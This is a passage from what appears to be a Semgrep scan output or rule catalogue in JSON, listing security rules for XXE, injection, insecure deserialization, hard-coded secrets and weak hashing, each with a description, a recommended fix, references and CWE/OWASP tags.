Rule](https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision)\n - [https://swcregistry.io/docs/SWC-133](https://swcregistry.io/docs/SWC-133)\n","text":"abi.encodePacked hash collision with variable length arguments in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision","id":"solidity.security.encode-packed-collision.encode-packed-collision","name":"solidity.security.encode-packed-collision.encode-packed-collision","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.encode-packed-collision.encode-packed-collision"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false","id":"csharp.lang.audit.cookies.httponly-false.httponly-false","name":"csharp.lang.audit.cookies.httponly-false.httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.audit.cookies.httponly-false.httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","id":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","name":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","id":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","name":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"help":{"markdown":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor)\n - [https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability](https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability)\n","text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"helpUri":"https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","id":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","name":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","id":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","name":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","id":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","name":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SonarQube Docs API Key detected"},"help":{"markdown":"SonarQube Docs API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SonarQube Docs API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","id":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","name":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"help":{"markdown":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli)\n - [https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf)\n","text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"helpUri":"https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","id":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","name":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","id":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","name":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","id":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","name":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"help":{"markdown":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server)\n - [https://nodejs.org/api/http.html#http_class_http_agent](https://nodejs.org/api/http.html#http_class_http_agent)\n - [https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY](https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY)\n","text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","id":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","name":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"help":{"markdown":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","id":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","name":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","id":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","name":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where 